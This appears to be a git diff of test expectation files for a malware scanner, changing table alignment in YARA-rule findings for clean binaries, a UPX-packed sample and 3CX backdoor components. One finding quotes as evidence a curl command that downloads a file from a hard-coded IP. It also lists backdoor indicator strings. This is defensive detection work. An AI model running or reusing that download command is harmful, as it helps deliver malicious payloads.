[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md index ae6790ef5..b993ef244 100644 --- a/tests/linux/UPX/06ed158.md +++ b/tests/linux/UPX/06ed158.md @@ -1,7 +1,7 @@ ## linux/UPX/06ed158 [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy footer in ELF binary (>7.4) | | | HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | | diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index 0717d207a..1aa125ec1 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md 
@@ -1,7 +1,7 @@ ## linux/clean/code-oss [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index 5794c73a7..caf2ce678 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -1,7 +1,7 @@ ## linux/clean/cpack [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code) | diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index eb7d72c0d..e2d48ee2d 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -1,7 +1,7 @@ ## linux/clean/ls.x86_64 [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | | LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index cc8ae37c6..834b8e910 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -1,7 +1,7 @@ ## linux/clean/lslogins [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/current_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/current_logins.yara#current_logins) | accesses current logins | [/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) | diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index c8a55bbd8..5eeb8aae4 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -1,7 +1,7 @@ ## linux/clean/pandoc [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index d9e6c0a59..ec993fe70 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -1,7 +1,7 @@ ## linux/clean/ping.x86_64 [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[id](https://github.com/search?q=id&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index 8b773f855..a7669e6db 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -1,7 +1,7 @@ ## linux/clean/qemu-system-xtensa [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [throttle_port](https://github.com/search?q=throttle_port&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 26b1e614d..1b763dcc3 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,7 +1,7 @@ ## linux/clean/redis-server.aarch64 [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [master_port](https://github.com/search?q=master_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 8f526acfe..f329a66f9 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -1,7 +1,7 @@ ## linux/clean/slack [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index 55067dd5c..d9151254c 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md 
@@ -1,7 +1,7 @@ ## linux/clean/tree-sitter [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[windows](https://github.com/search?q=windows&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index 09a90e0ea..a688d4310 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -1,7 +1,7 @@ ## linux/clean/trufflehog [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [anti-static/obfuscation/syscall](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/syscall.yara#go_raw_syscall) | invokes raw system calls | [unix.RawSyscall](https://github.com/search?q=unix.RawSyscall&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index cc0703928..a8a13d149 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -1,7 +1,7 @@ ## linux/clean/viewgam [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[](https://github.com/search?q=%3Chtml%3E&type=code) | | MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+parseInt(](https://github.com/search?q=%2BparseInt%28&type=code) | diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md index 00cf228d8..81b0b71db 100644 --- a/tests/linux/clean/zipdetails.md +++ b/tests/linux/clean/zipdetails.md @@ -1,7 +1,7 @@ ## linux/clean/zipdetails [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[http://](http://)
[Windows](https://github.com/search?q=Windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip files](https://github.com/search?q=zip+files&type=code)
[zipfile](https://github.com/search?q=zipfile&type=code)
[ZIP64](https://github.com/search?q=ZIP64&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index e33d81296..1f83074a3 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff @@ -3,7 +3,7 @@ ### 22 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | -CRITICAL | [3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16) | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | -CRITICAL | [3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275) | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | -CRITICAL | [3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214) | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff index d8e821280..a6594bcba 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff @@ -3,7 +3,7 @@ ### 22 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
